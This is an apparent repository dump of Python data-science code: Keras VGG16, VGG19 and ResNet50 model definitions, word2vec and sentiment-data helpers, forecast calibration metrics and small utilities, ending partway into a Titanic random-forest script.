for i in xrange(4): if X[i] is None: # if channel is None, fill it with zeros of the correct # dtype dt = out_array.dtype if output_pixel_vals: dt = 'uint8' out_array[:, :, i] = numpy.zeros( out_shape, dtype=dt ) + channel_defaults[i] else: # use a recurrent call to compute the channel and store it # in the output out_array[:, :, i] = tile_raster_images( X[i], img_shape, tile_shape, tile_spacing, scale_rows_to_unit_interval, output_pixel_vals) return out_array else: # if we are dealing with only one channel H, W = img_shape Hs, Ws = tile_spacing # generate a matrix to store the output dt = X.dtype if output_pixel_vals: dt = 'uint8' out_array = numpy.zeros(out_shape, dtype=dt) for tile_row in xrange(tile_shape[0]): for tile_col in xrange(tile_shape[1]): if tile_row * tile_shape[1] + tile_col < X.shape[0]: this_x = X[tile_row * tile_shape[1] + tile_col] if scale_rows_to_unit_interval: # if we should scale values to be between 0 and 1 # do this by calling the `scale_to_unit_interval` # function this_img = scale_to_unit_interval( this_x.reshape(img_shape)) else: this_img = this_x.reshape(img_shape) # add the slice to the corresponding position in the # output array c = 1 if output_pixel_vals: c = 255 out_array[ tile_row * (H + Hs): tile_row * (H + Hs) + H, tile_col * (W + Ws): tile_col * (W + Ws) + W ] = this_img * c return out_array File: deep-learning/keras-tutorial/w2v.py from gensim.models import word2vec from os.path import join, exists, split import os import numpy as np def train_word2vec(sentence_matrix, vocabulary_inv, num_features=300, min_word_count=1, context=10): """ Trains, saves, loads Word2Vec model Returns initial weights for embedding layer. inputs: sentence_matrix # int matrix: num_sentences x max_sentence_len vocabulary_inv # dict {str:int} num_features # Word vector dimensionality min_word_count # Minimum word count context # Context window size """ model_dir = 'word2vec_models' model_name = "{:d}features_{:d}minwords_{:d}context".format(num_features, min_word_count, context) model_name = join(model_dir, model_name) if exists(model_name): embedding_model = word2vec.Word2Vec.load(model_name) print('Loading existing Word2Vec model \'%s\'' % split(model_name)[-1]) else: # Set values for various parameters num_workers = 2 # Number of threads to run in parallel downsampling = 1e-3 # Downsample setting for frequent words # Initialize and train the model print("Training Word2Vec model...") sentences = [[vocabulary_inv[w] for w in s] for s in sentence_matrix] embedding_model = word2vec.Word2Vec(sentences, workers=num_workers, \ size=num_features, min_count = min_word_count, \ window = context, sample = downsampling) # If we don't plan to train the model any further, calling # init_sims will make the model much more memory-efficient. embedding_model.init_sims(replace=True) # Saving the model for later use. 
You can load it later using Word2Vec.load() if not exists(model_dir): os.mkdir(model_dir) print('Saving Word2Vec model \'%s\'' % split(model_name)[-1]) embedding_model.save(model_name) # add unknown words embedding_weights = [np.array([embedding_model[w] if w in embedding_model\ else np.random.uniform(-0.25,0.25,embedding_model.vector_size)\ for w in vocabulary_inv])] return embedding_weights if __name__=='__main__': import data_helpers print("Loading data...") x, _, _, vocabulary_inv = data_helpers.load_data() w = train_word2vec(x, vocabulary_inv) File: deep-learning/keras-tutorial/data_helpers.py import numpy as np import re import itertools from collections import Counter """ Original taken from https://github.com/dennybritz/cnn-text-classification-tf """ def clean_str(string): """ Tokenization/string cleaning for all datasets except for SST. Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py """ string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string) string = re.sub(r"\'s", " \'s", string) string = re.sub(r"\'ve", " \'ve", string) string = re.sub(r"n\'t", " n\'t", string) string = re.sub(r"\'re", " \'re", string) string = re.sub(r"\'d", " \'d", string) string = re.sub(r"\'ll", " \'ll", string) string = re.sub(r",", " , ", string) string = re.sub(r"!", " ! ", string) string = re.sub(r"\(", " \( ", string) string = re.sub(r"\)", " \) ", string) string = re.sub(r"\?", " \? ", string) string = re.sub(r"\s{2,}", " ", string) return string.strip().lower() def load_data_and_labels(): """ Loads MR polarity data from files, splits the data into words and generates labels. Returns split sentences and labels. """ # Load data from files positive_examples = list(open("./data/rt-polarity.pos", encoding='ISO-8859-1').readlines()) positive_examples = [s.strip() for s in positive_examples] negative_examples = list(open("./data/rt-polarity.neg", encoding='ISO-8859-1').readlines()) negative_examples = [s.strip() for s in negative_examples] # Split by words x_text = positive_examples + negative_examples x_text = [clean_str(sent) for sent in x_text] x_text = [s.split(" ") for s in x_text] # Generate labels positive_labels = [[0, 1] for _ in positive_examples] negative_labels = [[1, 0] for _ in negative_examples] y = np.concatenate([positive_labels, negative_labels], 0) return [x_text, y] def pad_sentences(sentences, padding_word="<PAD/>"): """ Pads all sentences to the same length. The length is defined by the longest sentence. Returns padded sentences. """ sequence_length = max(len(x) for x in sentences) padded_sentences = [] for i in range(len(sentences)): sentence = sentences[i] num_padding = sequence_length - len(sentence) new_sentence = sentence + [padding_word] * num_padding padded_sentences.append(new_sentence) return padded_sentences def build_vocab(sentences): """ Builds a vocabulary mapping from word to index based on the sentences. Returns vocabulary mapping and inverse vocabulary mapping. """ # Build vocabulary word_counts = Counter(itertools.chain(*sentences)) # Mapping from index to word vocabulary_inv = [x[0] for x in word_counts.most_common()] # Mapping from word to index vocabulary = {x: i for i, x in enumerate(vocabulary_inv)} return [vocabulary, vocabulary_inv] def build_input_data(sentences, labels, vocabulary): """ Maps sentencs and labels to vectors based on a vocabulary. 
""" x = np.array([[vocabulary[word] for word in sentence] for sentence in sentences]) y = np.array(labels) return [x, y] def load_data(): """ Loads and preprocessed data for the MR dataset. Returns input vectors, labels, vocabulary, and inverse vocabulary. """ # Load and preprocess data sentences, labels = load_data_and_labels() sentences_padded = pad_sentences(sentences) vocabulary, vocabulary_inv = build_vocab(sentences_padded) x, y = build_input_data(sentences_padded, labels, vocabulary) return [x, y, vocabulary, vocabulary_inv] def batch_iter(data, batch_size, num_epochs): """ Generates a batch iterator for a dataset. """ data = np.array(data) data_size = len(data) num_batches_per_epoch = int(len(data)/batch_size) + 1 for epoch in range(num_epochs): # Shuffle the data at each epoch shuffle_indices = np.random.permutation(np.arange(data_size)) shuffled_data = data[shuffle_indices] for batch_num in range(num_batches_per_epoch): start_index = batch_num * batch_size end_index = min((batch_num + 1) * batch_size, data_size) yield shuffled_data[start_index:end_index] File: deep-learning/keras-tutorial/deep_learning_models/imagenet_utils.py import numpy as np import json from keras.utils.data_utils import get_file from keras import backend as K CLASS_INDEX = None CLASS_INDEX_PATH = 'https://s3.amazonaws.com/deep-learning-models/image-models/imagenet_class_index.json' def preprocess_input(x, dim_ordering='default'): if dim_ordering == 'default': dim_ordering = K.image_dim_ordering() assert dim_ordering in {'tf', 'th'} if dim_ordering == 'th': x[:, 0, :, :] -= 103.939 x[:, 1, :, :] -= 116.779 x[:, 2, :, :] -= 123.68 # 'RGB'->'BGR' x = x[:, ::-1, :, :] else: x[:, :, :, 0] -= 103.939 x[:, :, :, 1] -= 116.779 x[:, :, :, 2] -= 123.68 # 'RGB'->'BGR' x = x[:, :, :, ::-1] return x def decode_predictions(preds): global CLASS_INDEX assert len(preds.shape) == 2 and preds.shape[1] == 1000 if CLASS_INDEX is None: fpath = get_file('imagenet_class_index.json', CLASS_INDEX_PATH, cache_subdir='models') CLASS_INDEX = json.load(open(fpath)) indices = np.argmax(preds, axis=-1) results = [] for i in indices: results.append(CLASS_INDEX[str(i)]) return results File: deep-learning/keras-tutorial/deep_learning_models/vgg16.py # -*- coding: utf-8 -*- '''VGG16 model for Keras. 
# Reference: - [Very Deep Convolutional Networks for Large-Scale Image Recognition](https://arxiv.org/abs/1409.1556) ''' from __future__ import print_function import numpy as np import warnings from keras.models import Model from keras.layers import Flatten, Dense, Input from keras.layers import Convolution2D, MaxPooling2D from keras.preprocessing import image from keras.utils.layer_utils import convert_all_kernels_in_model from keras.utils.data_utils import get_file from keras import backend as K # from imagenet_utils import decode_predictions, preprocess_input TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels.h5' TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5' TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels_notop.h5' TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5' def VGG16(include_top=True, weights='imagenet', input_tensor=None): '''Instantiate the VGG16 architecture, optionally loading weights pre-trained on ImageNet. Note that when using TensorFlow, for best performance you should set `image_dim_ordering="tf"` in your Keras config at ~/.keras/keras.json. The model and the weights are compatible with both TensorFlow and Theano. The dimension ordering convention used by the model is the one specified in your Keras config file. # Arguments include_top: whether to include the 3 fully-connected layers at the top of the network. weights: one of `None` (random initialization) or "imagenet" (pre-training on ImageNet). input_tensor: optional Keras tensor (i.e. output of `layers.Input()`) to use as image input for the model. # Returns A Keras model instance. 
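    # Example
        A rough usage sketch (it mirrors the `__main__` block at the bottom of
        this file and assumes `elephant.jpg` exists and that `preprocess_input`
        and `decode_predictions` are imported from `imagenet_utils`):

            model = VGG16(include_top=True, weights='imagenet')
            img = image.load_img('elephant.jpg', target_size=(224, 224))
            x = preprocess_input(np.expand_dims(image.img_to_array(img), axis=0))
            print(decode_predictions(model.predict(x)))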
''' if weights not in {'imagenet', None}: raise ValueError('The `weights` argument should be either ' '`None` (random initialization) or `imagenet` ' '(pre-training on ImageNet).') # Determine proper input shape if K.image_dim_ordering() == 'th': if include_top: input_shape = (3, 224, 224) else: input_shape = (3, None, None) else: if include_top: input_shape = (224, 224, 3) else: input_shape = (None, None, 3) if input_tensor is None: img_input = Input(shape=input_shape) else: if not K.is_keras_tensor(input_tensor): img_input = Input(tensor=input_tensor) else: img_input = input_tensor # Block 1 x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv1')(img_input) x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x) # Block 2 x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv1')(x) x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x) # Block 3 x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv1')(x) x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv2')(x) x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x) # Block 4 x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv1')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv2')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x) # Block 5 x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv1')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv2')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv3')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x) if include_top: # Classification block x = Flatten(name='flatten')(x) x = Dense(4096, activation='relu', name='fc1')(x) x = Dense(4096, activation='relu', name='fc2')(x) x = Dense(1000, activation='softmax', name='predictions')(x) # Create model model = Model(img_input, x) # load weights if weights == 'imagenet': print('K.image_dim_ordering:', K.image_dim_ordering()) if K.image_dim_ordering() == 'th': if include_top: weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels.h5', TH_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels_notop.h5', TH_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'tensorflow': warnings.warn('You are using the TensorFlow backend, yet you ' 'are using the Theano ' 'image dimension ordering convention ' '(`image_dim_ordering="th"`). 
' 'For best performance, set ' '`image_dim_ordering="tf"` in ' 'your Keras config ' 'at ~/.keras/keras.json.') convert_all_kernels_in_model(model) else: if include_top: weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels.h5', TF_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5', TF_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'theano': convert_all_kernels_in_model(model) return model if __name__ == '__main__': model = VGG16(include_top=True, weights='imagenet') img_path = 'elephant.jpg' img = image.load_img(img_path, target_size=(224, 224)) x = image.img_to_array(img) x = np.expand_dims(x, axis=0) x = preprocess_input(x) print('Input image shape:', x.shape) preds = model.predict(x) print('Predicted:', decode_predictions(preds)) File: deep-learning/keras-tutorial/deep_learning_models/vgg19.py # -*- coding: utf-8 -*- '''VGG19 model for Keras. # Reference: - [Very Deep Convolutional Networks for Large-Scale Image Recognition](https://arxiv.org/abs/1409.1556) ''' from __future__ import print_function import numpy as np import warnings from keras.models import Model from keras.layers import Flatten, Dense, Input from keras.layers import Convolution2D, MaxPooling2D from keras.preprocessing import image from keras.utils.layer_utils import convert_all_kernels_in_model from keras.utils.data_utils import get_file from keras import backend as K TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_th_dim_ordering_th_kernels.h5' TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_tf_dim_ordering_tf_kernels.h5' TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_th_dim_ordering_th_kernels_notop.h5' TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_tf_dim_ordering_tf_kernels_notop.h5' def VGG19(include_top=True, weights='imagenet', input_tensor=None): '''Instantiate the VGG19 architecture, optionally loading weights pre-trained on ImageNet. Note that when using TensorFlow, for best performance you should set `image_dim_ordering="tf"` in your Keras config at ~/.keras/keras.json. The model and the weights are compatible with both TensorFlow and Theano. The dimension ordering convention used by the model is the one specified in your Keras config file. # Arguments include_top: whether to include the 3 fully-connected layers at the top of the network. weights: one of `None` (random initialization) or "imagenet" (pre-training on ImageNet). input_tensor: optional Keras tensor (i.e. output of `layers.Input()`) to use as image input for the model. # Returns A Keras model instance. 
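    # Example
        A rough sketch of using the network as a fixed feature extractor
        (illustrative only; `x` is assumed to be a preprocessed image batch of
        shape (n, 224, 224, 3) under the tf dimension ordering):

            base_model = VGG19(include_top=False, weights='imagenet')
            features = base_model.predict(x)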
''' if weights not in {'imagenet', None}: raise ValueError('The `weights` argument should be either ' '`None` (random initialization) or `imagenet` ' '(pre-training on ImageNet).') # Determine proper input shape if K.image_dim_ordering() == 'th': if include_top: input_shape = (3, 224, 224) else: input_shape = (3, None, None) else: if include_top: input_shape = (224, 224, 3) else: input_shape = (None, None, 3) if input_tensor is None: img_input = Input(shape=input_shape) else: if not K.is_keras_tensor(input_tensor): img_input = Input(tensor=input_tensor) else: img_input = input_tensor # Block 1 x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv1')(img_input) x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x) # Block 2 x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv1')(x) x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv2')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x) # Block 3 x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv1')(x) x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv2')(x) x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv3')(x) x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv4')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x) # Block 4 x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv1')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv2')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv3')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv4')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x) # Block 5 x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv1')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv2')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv3')(x) x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv4')(x) x = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x) if include_top: # Classification block x = Flatten(name='flatten')(x) x = Dense(4096, activation='relu', name='fc1')(x) x = Dense(4096, activation='relu', name='fc2')(x) x = Dense(1000, activation='softmax', name='predictions')(x) # Create model model = Model(img_input, x) # load weights if weights == 'imagenet': print('K.image_dim_ordering:', K.image_dim_ordering()) if K.image_dim_ordering() == 'th': if include_top: weights_path = get_file('vgg19_weights_th_dim_ordering_th_kernels.h5', TH_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('vgg19_weights_th_dim_ordering_th_kernels_notop.h5', TH_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'tensorflow': warnings.warn('You are using the TensorFlow backend, yet you ' 'are using the Theano ' 'image dimension ordering convention ' '(`image_dim_ordering="th"`). 
' 'For best performance, set ' '`image_dim_ordering="tf"` in ' 'your Keras config ' 'at ~/.keras/keras.json.') convert_all_kernels_in_model(model) else: if include_top: weights_path = get_file('vgg19_weights_tf_dim_ordering_tf_kernels.h5', TF_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('vgg19_weights_tf_dim_ordering_tf_kernels_notop.h5', TF_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'theano': convert_all_kernels_in_model(model) return model if __name__ == '__main__': model = VGG19(include_top=True, weights='imagenet') img_path = 'cat.jpg' img = image.load_img(img_path, target_size=(224, 224)) x = image.img_to_array(img) x = np.expand_dims(x, axis=0) x = preprocess_input(x) print('Input image shape:', x.shape) preds = model.predict(x) print('Predicted:', decode_predictions(preds)) File: deep-learning/keras-tutorial/deep_learning_models/resnet50.py # -*- coding: utf-8 -*- '''ResNet50 model for Keras. # Reference: - [Deep Residual Learning for Image Recognition](https://arxiv.org/abs/1512.03385) Adapted from code contributed by BigMoyan. ''' from __future__ import print_function import numpy as np import warnings from keras.layers import merge, Input from keras.layers import Dense, Activation, Flatten from keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D, AveragePooling2D from keras.layers import BatchNormalization from keras.models import Model from keras.preprocessing import image import keras.backend as K from keras.utils.layer_utils import convert_all_kernels_in_model from keras.utils.data_utils import get_file TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/resnet50_weights_th_dim_ordering_th_kernels.h5' TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/resnet50_weights_tf_dim_ordering_tf_kernels.h5' TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/resnet50_weights_th_dim_ordering_th_kernels_notop.h5' TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5' def identity_block(input_tensor, kernel_size, filters, stage, block): '''The identity_block is the block that has no conv layer at shortcut # Arguments input_tensor: input tensor kernel_size: defualt 3, the kernel size of middle conv layer at main path filters: list of integers, the nb_filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names ''' nb_filter1, nb_filter2, nb_filter3 = filters if K.image_dim_ordering() == 'tf': bn_axis = 3 else: bn_axis = 1 conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = Convolution2D(nb_filter1, 1, 1, name=conv_name_base + '2a')(input_tensor) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x) x = Activation('relu')(x) x = Convolution2D(nb_filter2, kernel_size, kernel_size, border_mode='same', name=conv_name_base + '2b')(x) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x) x = Activation('relu')(x) x = Convolution2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x) x = merge([x, input_tensor], mode='sum') x = Activation('relu')(x) return x def conv_block(input_tensor, kernel_size, filters, stage, block, strides=(2, 
2)): '''conv_block is the block that has a conv layer at shortcut # Arguments input_tensor: input tensor kernel_size: defualt 3, the kernel size of middle conv layer at main path filters: list of integers, the nb_filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names Note that from stage 3, the first conv layer at main path is with subsample=(2,2) And the shortcut should have subsample=(2,2) as well ''' nb_filter1, nb_filter2, nb_filter3 = filters if K.image_dim_ordering() == 'tf': bn_axis = 3 else: bn_axis = 1 conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = Convolution2D(nb_filter1, 1, 1, subsample=strides, name=conv_name_base + '2a')(input_tensor) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x) x = Activation('relu')(x) x = Convolution2D(nb_filter2, kernel_size, kernel_size, border_mode='same', name=conv_name_base + '2b')(x) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x) x = Activation('relu')(x) x = Convolution2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x) x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x) shortcut = Convolution2D(nb_filter3, 1, 1, subsample=strides, name=conv_name_base + '1')(input_tensor) shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1')(shortcut) x = merge([x, shortcut], mode='sum') x = Activation('relu')(x) return x def ResNet50(include_top=True, weights='imagenet', input_tensor=None): '''Instantiate the ResNet50 architecture, optionally loading weights pre-trained on ImageNet. Note that when using TensorFlow, for best performance you should set `image_dim_ordering="tf"` in your Keras config at ~/.keras/keras.json. The model and the weights are compatible with both TensorFlow and Theano. The dimension ordering convention used by the model is the one specified in your Keras config file. # Arguments include_top: whether to include the 3 fully-connected layers at the top of the network. weights: one of `None` (random initialization) or "imagenet" (pre-training on ImageNet). input_tensor: optional Keras tensor (i.e. xput of `layers.Input()`) to use as image input for the model. # Returns A Keras model instance. 
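    # Example
        A rough sketch of wiring the network to an explicit input tensor
        (illustrative only; the (224, 224, 3) shape assumes the tf dimension
        ordering):

            img_in = Input(shape=(224, 224, 3))
            model = ResNet50(include_top=True, weights='imagenet',
                             input_tensor=img_in)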
''' if weights not in {'imagenet', None}: raise ValueError('The `weights` argument should be either ' '`None` (random initialization) or `imagenet` ' '(pre-training on ImageNet).') # Determine proper input shape if K.image_dim_ordering() == 'th': if include_top: input_shape = (3, 224, 224) else: input_shape = (3, None, None) else: if include_top: input_shape = (224, 224, 3) else: input_shape = (None, None, 3) if input_tensor is None: img_input = Input(shape=input_shape) else: if not K.is_keras_tensor(input_tensor): img_input = Input(tensor=input_tensor) else: img_input = input_tensor if K.image_dim_ordering() == 'tf': bn_axis = 3 else: bn_axis = 1 x = ZeroPadding2D((3, 3))(img_input) x = Convolution2D(64, 7, 7, subsample=(2, 2), name='conv1')(x) x = BatchNormalization(axis=bn_axis, name='bn_conv1')(x) x = Activation('relu')(x) x = MaxPooling2D((3, 3), strides=(2, 2))(x) x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1)) x = identity_block(x, 3, [64, 64, 256], stage=2, block='b') x = identity_block(x, 3, [64, 64, 256], stage=2, block='c') x = conv_block(x, 3, [128, 128, 512], stage=3, block='a') x = identity_block(x, 3, [128, 128, 512], stage=3, block='b') x = identity_block(x, 3, [128, 128, 512], stage=3, block='c') x = identity_block(x, 3, [128, 128, 512], stage=3, block='d') x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a') x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b') x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c') x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d') x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e') x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f') x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a') x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b') x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c') x = AveragePooling2D((7, 7), name='avg_pool')(x) if include_top: x = Flatten()(x) x = Dense(1000, activation='softmax', name='fc1000')(x) model = Model(img_input, x) # load weights if weights == 'imagenet': print('K.image_dim_ordering:', K.image_dim_ordering()) if K.image_dim_ordering() == 'th': if include_top: weights_path = get_file('resnet50_weights_th_dim_ordering_th_kernels.h5', TH_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('resnet50_weights_th_dim_ordering_th_kernels_notop.h5', TH_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'tensorflow': warnings.warn('You are using the TensorFlow backend, yet you ' 'are using the Theano ' 'image dimension ordering convention ' '(`image_dim_ordering="th"`). 
' 'For best performance, set ' '`image_dim_ordering="tf"` in ' 'your Keras config ' 'at ~/.keras/keras.json.') convert_all_kernels_in_model(model) else: if include_top: weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels.h5', TF_WEIGHTS_PATH, cache_subdir='models') else: weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5', TF_WEIGHTS_PATH_NO_TOP, cache_subdir='models') model.load_weights(weights_path) if K.backend() == 'theano': convert_all_kernels_in_model(model) return model if __name__ == '__main__': model = ResNet50(include_top=True, weights='imagenet') img_path = 'elephant.jpg' img = image.load_img(img_path, target_size=(224, 224)) x = image.img_to_array(img) x = np.expand_dims(x, axis=0) x = preprocess_input(x) print('Input image shape:', x.shape) preds = model.predict(x) print('Predicted:', decode_predictions(preds)) File: deep-learning/keras-tutorial/solutions/sol_112.py ann = ANN(2, 10, 1) %timeit -n 1 -r 1 ann.train(zip(X,y), iterations=100) plot_decision_boundary(ann) plt.title("Our model with 10 hidden units and 100 iterations") File: deep-learning/keras-tutorial/solutions/sol_111.py ann = ANN(2, 10, 1) %timeit -n 1 -r 1 ann.train(zip(X,y), iterations=2) plot_decision_boundary(ann) plt.title("Our next model with 10 hidden units") File: kaggle/__init__.py File: numpy/__init__.py File: analyses/churn_measurements.py from __future__ import division import numpy as np __author__ = "Eric Chiang" __email__ = "eric[at]yhathq.com" """ Measurements inspired by Philip Tetlock's "Expert Political Judgment" Equations take from Yaniv, Yates, & Smith (1991): "Measures of Descrimination Skill in Probabilistic Judgement" """ def calibration(prob,outcome,n_bins=10): """Calibration measurement for a set of predictions. When predicting events at a given probability, how far is frequency of positive outcomes from that probability? NOTE: Lower scores are better prob: array_like, float Probability estimates for a set of events outcome: array_like, bool If event predicted occurred n_bins: int Number of judgement categories to prefrom calculation over. Prediction are binned based on probability, since "descrete" probabilities aren't required. """ prob = np.array(prob) outcome = np.array(outcome) c = 0.0 # Construct bins judgement_bins = np.arange(n_bins + 1) / n_bins # Which bin is each prediction in? bin_num = np.digitize(prob,judgement_bins) for j_bin in np.unique(bin_num): # Is event in bin in_bin = bin_num == j_bin # Predicted probability taken as average of preds in bin predicted_prob = np.mean(prob[in_bin]) # How often did events in this bin actually happen? true_bin_prob = np.mean(outcome[in_bin]) # Squared distance between predicted and true times num of obs c += np.sum(in_bin) * ((predicted_prob - true_bin_prob) ** 2) return c / len(prob) def discrimination(prob,outcome,n_bins=10): """Discrimination measurement for a set of predictions. For each judgement category, how far from the base probability is the true frequency of that bin? NOTE: High scores are better prob: array_like, float Probability estimates for a set of events outcome: array_like, bool If event predicted occurred n_bins: int Number of judgement categories to prefrom calculation over. Prediction are binned based on probability, since "descrete" probabilities aren't required. 
""" prob = np.array(prob) outcome = np.array(outcome) d = 0.0 # Base frequency of outcomes base_prob = np.mean(outcome) # Construct bins judgement_bins = np.arange(n_bins + 1) / n_bins # Which bin is each prediction in? bin_num = np.digitize(prob,judgement_bins) for j_bin in np.unique(bin_num): in_bin = bin_num == j_bin true_bin_prob = np.mean(outcome[in_bin]) # Squared distance between true and base times num of obs d += np.sum(in_bin) * ((true_bin_prob - base_prob) ** 2) return d / len(prob) File: analyses/__init__.py File: python-data/transform_util.py import re class TransformUtil: @classmethod def remove_punctuation(cls, value): """Removes !, #, and ?. """ return re.sub('[!#?]', '', value) @classmethod def clean_strings(cls, strings, ops): """General purpose method to clean strings. Pass in a sequence of strings and the operations to perform. """ result = [] for value in strings: for function in ops: value = function(value) result.append(value) return result File: python-data/__init__.py File: python-data/type_util.py class TypeUtil: @classmethod def is_iterable(cls, obj): """Determines if obj is iterable. Useful when writing functions that can accept multiple types of input (list, tuple, ndarray, iterator). Pairs well with convert_to_list. """ try: iter(obj) return True except TypeError: return False @classmethod def convert_to_list(cls, obj): """Converts obj to a list if it is not a list and it is iterable, else returns the original obj. """ if not isinstance(obj, list) and cls.is_iterable(obj): obj = list(obj) return obj File: matplotlib/__init__.py File: aws/__init__.py File: commands/__init__.py File: data/titanic/myfirstforest.py """ Writing my first randomforest code. Author : AstroDave Date : 23rd September 2012 Revised: 15 April 2014 please see packages.python.org/milk/randomforests.html for more """ import pandas as pd import numpy as np import csv as csv from sklearn.ensemble import RandomForestClassifier # Data cleanup # TRAIN DATA train_df = 